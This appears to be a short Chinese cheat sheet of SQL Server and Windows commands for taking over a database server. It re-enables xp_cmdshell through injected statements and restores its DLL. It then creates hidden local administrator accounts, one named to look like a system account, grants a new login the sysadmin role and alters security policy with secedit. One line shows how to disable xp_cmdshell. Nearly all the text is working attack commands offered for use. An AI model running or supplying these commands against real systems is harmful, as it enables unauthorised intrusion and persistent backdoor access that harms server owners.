日期:2014-02-24  浏览次数:20416 次

exec master..xp_cmdshell "net user name password /add"--
exec master..xp_cmdshell "net localgroup administrators name /add"--

程序代码开启cmdshell的SQL语句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"


DOS:
dir c:/
dir d:/
dir e:/

net user TsInternetUsers Password /add
net localGroup Administrators TsInternetUsers /add

备份恢复IPSEC

secedit /export /CFG c:/tmp.inf
echo sedenynetworkLOGOnright =>>c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf

SQL:
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin